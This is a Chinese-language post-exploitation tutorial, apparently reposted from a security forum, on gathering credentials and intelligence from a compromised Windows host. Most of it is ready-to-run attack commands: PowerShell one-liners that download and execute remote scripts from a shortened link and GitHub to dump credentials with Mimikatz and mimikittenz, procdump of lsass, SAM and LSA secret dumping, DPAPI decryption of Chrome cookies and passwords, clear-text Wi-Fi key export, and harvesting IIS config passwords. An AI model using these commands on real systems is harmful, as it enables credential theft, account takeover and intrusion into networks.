后渗透攻防的信息收集之cmd下信息收集
1.1 系统管理员密码
1.2 其他用户session,3389和ipc连接记录 各用户回收站信息收集
1.3 浏览器密码和浏览器cookies的获取 ie chrome firefox 等
1.4 windows无线密码获取。数据库密码获取
1.5 host文件获取和dns缓存信息收集 等等
1.6 杀软 补丁 进程 网络代理信息wpad信息。软件列表信息
1.7 计划任务 账号密码策略与锁定策略 共享文件夹 web服务器配置文件
1.8 vpn历史密码等 teamview密码等 启动项 iislog 等等
1.9 常用的后渗透信息收集工具。powershell+passrec的使用
1.mimikatz
2.wce
3.getpass
5.reg-sam
6.pwdump7
7.procdump.exe +mimikatz .......
1.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
tips:powershell 默认windows visa后才有
2. procdump lsass 进程导出技巧
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits
然后本地使用mimikatz 还原密码
cmdkey /list
查看3389可信任链接
使用netpass.exe 即可知道密码
net use
查看到已建立连接记录。
也是直接可以 用wmic at sc 等直接执行命令的
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit
其他工具如Dialupass.exe
感兴趣可以看看mimikatz dpapi模块的使用。很强大 sam 密码 ipc连接密码
netsh wlan export profile interface=无线网络连接 key=clear folder=C:\
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
C:\Windows\System32\drivers\etc\hosts windows7 windows2008等
C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS windows2003位置
提权情况下或者过了uac的情况下直接type一下就行了
iis-web路径
iis6 =========>cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root
iis7 ,8 =======>appcmd.exe
%systemroot%/system32/inetsrv/appcmd.exe list site ——列出网站列表
%systemroot%\system32\inetsrv\appcmd.exe list vdir ——列出网站物理路径
当然你也可以用mimikatz
mimiktaz 读取iis7配置文件密码
mimikatz.exe privilege::debug log "iis::apphost /in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live" exit
其中$I开头的文件保存的是路径信息 $R保存的是文件
FOR /f "skip=1 tokens=1,2 delims= " %c in ('wmic useraccount get name^,sid') do dir /a /b C:\$Recycle.Bin\%d\ ^>%c.txt
$Recycler = (New-Object -ComObject Shell.Application).NameSpace(0xa); foreach($file in $Recycler.items()){$file.path;$file.ExtendedProperty("{9B174B33-40FF-11D2-A27E-00C04FC30871} 2")+'\'+$file.name;$file.Type}
%localappdata%\google\chrome\USERDA~1\default\LOGIND~1
%localappdata%\google\chrome\USERDA~1\default\USERDA~1
%localappdata%\google\chrome\USERDA~1\default\cookies
chrome的用户信息保存在本地文件为sqlite 数据库格式
mimikatz 读取chrome cookies
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1" exit mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit //读chrome密码
passrec 工具包里面包含常用的密码恢复工具;
是内网渗透的好帮手
vnc
vpn
router
ie
firefox
chrome 等等,有兴趣可以自己测试
FTP访问、共享连接、putty连接 驱动、应用程序、hosts 文件、进程、无线网络记录
powershell "IEX (New-Object Net.WebClient).DownloadString(' https://github.com/samratashok/nishang/tree/master/Gather/Gather/Get-Information.ps1'); Get-Information"
正则过滤进程密码,已测windows7
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'); Invoke-mimikittenz
sqlserver密码获取工具Get-MSSQLCredentialPasswords.psm1 //未测
windows自带的命令就可以
日志查看收集
1、Windows2003下默认存在eventquery.vbs
cscript c:\WINDOWS\system32\eventquery.vbs /fi "Datetime eq 06/24/2015,01:00:00AM-06/24/2015,10:00:00AM" /l Security /V #查看SECURITY日志 2015-6.24 上午1点-上午10点日志
windows 7以上wevtutil 命令
2 .wevtutil qe security /rd:true /f:text /q:"*[system/eventid=4624 and 4623 and 4627]" #查询所有登录、注销相关的日志语法
3.第三方信息收集工具LogParser.exe psloglist.exe等
抛砖引玉!!!!!欢迎交流
下期:windows自带的后门维持工具
Tips:已360为例,绕过技巧
附件后渗透的信息收集.pptx:
链接: http://pan.baidu.com/s/1o8NFSaI 密码: ypd8
脉搏编辑推荐:本地密码检索工具 – LaZagne Project
【原文来自:T00ls 作者:Triple kill团队 他的Powershell交流群:527603148 后渗透攻防的信息收集 安全脉搏授权整理发布】